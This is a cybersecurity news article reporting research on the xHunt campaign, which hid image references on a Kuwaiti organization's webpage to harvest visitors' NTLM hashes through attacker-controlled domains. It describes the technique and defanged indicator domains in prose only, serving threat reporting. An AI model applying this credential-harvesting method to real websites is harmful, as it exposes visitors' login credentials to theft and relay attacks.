xHunt Campaign Use Organization’s Webpage as Watering Hole to Steal Customer Login Details

xHunt campaign knows to be active since July 2018 and they target the transportation and shipping organizations based in Kuwait.

The attack campaign named xHunt, because they used the name of the tools from the character names of the series Hunter x Hunter.

xHunt Campaign Activities

Unit42 researchers spotted a new XHunt attack campaign that compromises Kuwaiti organization’s webpage and used it as a watering hole.

The attackers stored hidden image files on the website between June and December 2019. Earlier the referenced microsofte-update[.]com and later changed to learn-service[.]com.

The attack was aimed to harvest the account credentials in the form of NTLM hashes from the webpage’s visitors.

By having the NTLM handshake and other information they could crack the hashes and obtain the username and password or launch a relay attack.

To test further researchers set up the Responder tool on a server and configured the environment to have the domain microsofte-update[.]com resolve to the server.

“We then visited the website from another system in our lab that had the HTML code injected and observed the Responder tool gathering the domain name, user name, IP address and NTLM hashes from the system on which we visited the website.”

Further DNS analysis on the Kuwaiti organization’s webpage reveals that another organization within Kuwait began resolving to infrastructure utilized by the xHunt operators.

Sakabota and Hisoka DNS Timeline

Here is the DNS activity timeline of Sakabota and Hisoka DNS.

  • Top row – targeted organizations
  • Middle row – Infrastructure
  • Bottom row – xHunt domains

Attackers also obtained Let’s Encrypt SSL certificates that contained the name of the redirected domain.

Researchers believe the same threat actor group behind bot the Hisoka attack campaign and xHunt attack Campaign.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates


Gurubaran is a Security Consultant, Security Editor & Co-Founder of Cyber Security News & GBHackers On Security.

Recent Posts

GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability

Attackers are exploiting the recently discovered critical security vulnerability tracked as (CVE-2023-46604) affecting Apache ActiveMQ…

16 hours ago

Cybercriminals are Showing Hesitation to Utilize AI When Executing Cyber Attacks

Media reports highlight the sale of LLMs like WormGPT and FraudGPT on underground forums. Fears…

17 hours ago

Vigil: Open-source Security Scanner for LLM Models Like ChatGPT

An open-source security scanner, developed by Git Hub user Adam Swanda, was released to explore…

17 hours ago

Slovenia’s Biggest Power Provider has Suffered a Cyberattack

One of Slovenia's major power providers, HSE, has recently fallen victim to a significant cyberattack.…

17 hours ago

Genesis Market Technique: Hackers Exploited Node.js and EV Certificates

In the labyrinthine landscape of cyber threats, the Trend Micro Managed XDR team has uncovered…

20 hours ago

Design Flaw in Domain-Wide Delegation Could Leave Google Workspace Vulnerable to Takeover – Hunters

BOSTON, MASS. and TEL AVIV, ISRAEL, November 28, 2023 - A severe design flaw in…

2 days ago